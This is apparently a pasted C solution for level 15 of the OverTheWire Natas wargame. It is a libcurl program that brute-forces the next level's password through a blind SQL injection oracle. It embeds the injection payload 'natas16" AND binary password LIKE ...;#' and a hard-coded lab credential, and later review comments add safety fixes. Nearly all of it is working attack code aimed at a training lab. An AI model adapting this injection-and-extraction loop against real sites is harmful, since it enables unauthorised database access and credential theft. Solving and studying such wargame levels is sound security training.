badeip

solution to natas overthewire, level #15 - ninja style

Nov 5th, 2012
  1. // solution to level 15 of http://www.overthewire.org/wargames/natas/
  2. // by petter wahlman, https://twitter.com/badeip
  3.  
  4. // gcc level15.c -lcurl -O2 && ./a.out
  5.  
  6. #define _GNU_SOURCE
  7. #include <stdio.h>
  8. #include <stdlib.h>
  9. #include <unistd.h>
  10. #include <string.h>
  11. #include <unistd.h>
  12. #include <fcntl.h>
  13. #include <signal.h>
  14. #include <curl/curl.h>
  15.  
  /* Accumulator for one HTTP response body; curl_wmem() appends to it. */
  struct mem_struct {
      char *memory; /* heap buffer, kept NUL-terminated by curl_wmem() */
      size_t size;  /* payload bytes stored so far, terminator not counted */
  };
  20.  
  /* Shared libcurl easy handle: created in curl_init(), used by callback(). */
  static CURL *curl;

  /*
   * Upper bound that incremental_force() applies when it appends to the
   * candidate string.
   * NOTE(review): this value must never exceed the size of the buffer the
   * caller actually supplies (main() uses a 34-byte array); a larger bound
   * lets the append run past the end of that array.
   */
  static unsigned int password_maxlen = 1024; // should suffice for a few light years
  23.  
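  /**
   * Depth-first prefix search over charset.
   *
   * Appends each character of charset in turn to the NUL-terminated string in
   * password and hands the result to callback. When callback returns 0 the
   * candidate was accepted and the search recurses to extend it by one more
   * character. The buffer is restored to its original content before the
   * function returns.
   *
   * @param charset   NUL-terminated set of characters tried at each position.
   * @param password  Writable buffer holding the current prefix; it must be at
   *                  least password_maxlen bytes long.
   * @param callback  Oracle: returns 0 if the candidate matched, non-zero
   *                  otherwise.
   * @return always 0.
   */
  static int incremental_force(const char *charset, char *password, int (*callback)(const char *))
  {
      const size_t password_len = strlen(password);
      const size_t charset_len = strlen(charset); /* was re-evaluated on every iteration */

      /*
       * One more character plus the terminator must still fit. Without this
       * check the old "password_maxlen - password_len" bound could reach zero
       * (nothing appended, same candidate re-tested, unbounded recursion) or
       * wrap around as an unsigned value.
       */
      if (password_len + 1 >= password_maxlen)
          return 0;

      for (size_t i = 0; i < charset_len; i++) {
          password[password_len] = charset[i];
          password[password_len + 1] = '\0';
          if (!callback(password))
              incremental_force(charset, password, callback);
          /* drop the trial character again before trying the next one */
          password[password_len] = '\0';
      }

      return 0;
  }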
  38.  
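  /**
   * Oracle used by incremental_force(): tests one candidate prefix.
   *
   * Builds a request whose username parameter decodes to
   *   natas16" AND binary password LIKE '<str>%';#
   * and fetches it with the shared curl handle. The response body is collected
   * through CURLOPT_WRITEDATA into a mem_struct; a body containing
   * "this user exists" (case-insensitive) counts as a match. A spinner and,
   * on a match, the candidate are printed on one terminal line.
   *
   * The request only works as an oracle if the server splices the username
   * value into its SQL text unescaped; binding the value as a query parameter
   * removes it.
   *
   * str is inserted into the URL without escaping, so it must consist of
   * URL-safe characters (main() passes an alphanumeric charset).
   *
   * @param str  Candidate prefix, NUL-terminated.
   * @return 0 if the candidate matched, non-zero otherwise (including when
   *         the request could not be built or the transfer failed).
   */
  static inline int callback(const char *str)
  {
      static unsigned long long attempts;
      const char spin[] = "|/-\\";
      /* starts empty: the write callback grows it with realloc(), which accepts NULL */
      struct mem_struct chunk = { .memory = NULL, .size = 0 };
      char *url = NULL;
      char *sql = NULL;
      int match = 0;

      /* asprintf() leaves the pointer undefined on failure, so reset it before cleanup */
      if (asprintf(&sql, "natas16%%22%%20AND%%20binary%%20password%%20LIKE%%20%%27%s%%25%%27%%3b%%23", str) < 0) {
          sql = NULL;
          goto out;
      }
      if (asprintf(&url, "http://natas15.natas.labs.overthewire.org/?debug=1&username=%s", sql) < 0) {
          url = NULL;
          goto out;
      }

      curl_easy_setopt(curl, CURLOPT_URL, url);
      curl_easy_setopt(curl, CURLOPT_WRITEDATA, (void *)&chunk);

      /* a failed transfer may leave a partial body; do not read a verdict from it */
      CURLcode res = curl_easy_perform(curl);
      if (res != CURLE_OK) {
          fprintf(stderr, "\nrequest failed: %s\n", curl_easy_strerror(res));
          goto out;
      }

      if (chunk.size && strcasestr(chunk.memory, "this user exists"))
          match = 1;

      printf("\r[%c] password: %s", spin[attempts++ % 4], match ? str : "");
      fflush(stdout);

  out:
      free(chunk.memory);
      free(sql);
      free(url);

      return !match;
  }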
  70.  
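  /**
   * libcurl write callback: appends one chunk of response data to a mem_struct.
   *
   * The buffer is grown with realloc() and kept NUL-terminated so the caller
   * can treat it as a C string.
   *
   * @param contents  Chunk delivered by libcurl (not NUL-terminated).
   * @param size      Element size.
   * @param nmemb     Element count; the chunk is size * nmemb bytes.
   * @param userp     The struct mem_struct registered with CURLOPT_WRITEDATA.
   * @return the number of bytes consumed (size * nmemb). On allocation failure
   *         or a size that cannot be represented, the process exits with
   *         EXIT_FAILURE.
   */
  static size_t curl_wmem(void *contents, size_t size, size_t nmemb, void *userp)
  {
      struct mem_struct *mem = userp;
      const size_t size_max = (size_t)-1;

      /* reject size * nmemb and mem->size + realsize + 1 if either would wrap */
      if (nmemb != 0 && size > size_max / nmemb) {
          fprintf(stderr, "response chunk too large\n");
          exit(EXIT_FAILURE);
      }
      const size_t realsize = size * nmemb;
      if (mem->size >= size_max || realsize > size_max - mem->size - 1) {
          fprintf(stderr, "response too large\n");
          exit(EXIT_FAILURE);
      }

      /* keep the old pointer until realloc() has succeeded */
      char *grown = realloc(mem->memory, mem->size + realsize + 1);
      if (grown == NULL) {
          fprintf(stderr, "not enough memory (realloc returned NULL)\n");
          exit(EXIT_FAILURE);
      }
      mem->memory = grown;

      memcpy(grown + mem->size, contents, realsize);
      mem->size += realsize;
      mem->memory[mem->size] = 0;

      return realsize;
  }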
  88.  
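  /**
   * Initialises libcurl and the shared easy handle.
   *
   * Sets the HTTP credentials, installs curl_wmem() as the write callback and
   * sets the User-Agent. Exits with EXIT_FAILURE if libcurl cannot be
   * initialised, instead of continuing with a NULL handle.
   *
   * NOTE(review): the credential is hard-coded in the source, and callback()
   * requests an http:// URL, so it is presumably sent without transport
   * encryption. Prefer supplying it at run time and using TLS where the
   * server offers it.
   */
  static void curl_init(void)
  {
      if (curl_global_init(CURL_GLOBAL_ALL) != CURLE_OK) {
          fprintf(stderr, "curl_global_init failed\n");
          exit(EXIT_FAILURE);
      }

      curl = curl_easy_init();
      if (curl == NULL) {
          fprintf(stderr, "curl_easy_init failed\n");
          curl_global_cleanup();
          exit(EXIT_FAILURE);
      }

      curl_easy_setopt(curl, CURLOPT_USERPWD, "natas15:m2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV");
      curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, curl_wmem);
      curl_easy_setopt(curl, CURLOPT_USERAGENT, "libcurl-agent/1.0");
  }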
  97.  
  /*
   * Restore the terminal cursor: stop blinking (?12l), then show it (?25h).
   * puts() appends a newline after the escape sequences.
   */
  static inline void cursor_on(void)
  {
      puts("\33[?12l\33[?25h");
  }
  /*
   * Hide the terminal cursor (?25l) while the spinner is drawn.
   * puts() appends a newline after the escape sequence.
   */
  static inline void cursor_off(void)
  {
      puts("\33[?25l");
  }
  100.  
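  /**
   * Signal handler: makes the cursor visible again, then re-delivers the
   * signal with its default action so the process ends as it normally would.
   *
   * Only async-signal-safe calls are made here. The previous version called
   * puts(), fflush() and curl_global_cleanup() from the handler; none of
   * those may be called safely if the signal interrupts stdio or libcurl.
   * The library cleanup is skipped because the re-raised signal is expected
   * to end the process.
   *
   * @param sig  Signal number being handled.
   */
  void sighandler(int sig)
  {
      /* same bytes cursor_on() emits through puts(), including the newline */
      static const char restore[] = "\33[?12l\33[?25h\n";

      if (write(STDOUT_FILENO, restore, sizeof restore - 1) < 0) {
          /* nothing useful can be done about a failed write here */
      }

      signal(sig, SIG_DFL);
      raise(sig);
  }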
  109.  
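  /**
   * Entry point: sets up signal handling and libcurl, runs the prefix search
   * with callback() as the oracle, then restores the terminal and releases
   * the libcurl resources.
   *
   * @return the value returned by incremental_force().
   */
  int main(int argc, char **argv)
  {
      const char charset[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
      char password[34] = { 0 };

      (void)argc;
      (void)argv;

      /*
       * incremental_force() limits its writes by password_maxlen, so the
       * limit has to describe this buffer; the default is larger than the
       * 34 bytes available here.
       */
      password_maxlen = sizeof password;

      signal(SIGINT, sighandler);

      curl_init();

      cursor_off();
      int ret = incremental_force(charset, password, callback);
      cursor_on();
      printf("\n");

      /* release the easy handle before tearing down the library */
      curl_easy_cleanup(curl);
      curl_global_cleanup();

      return ret;
  }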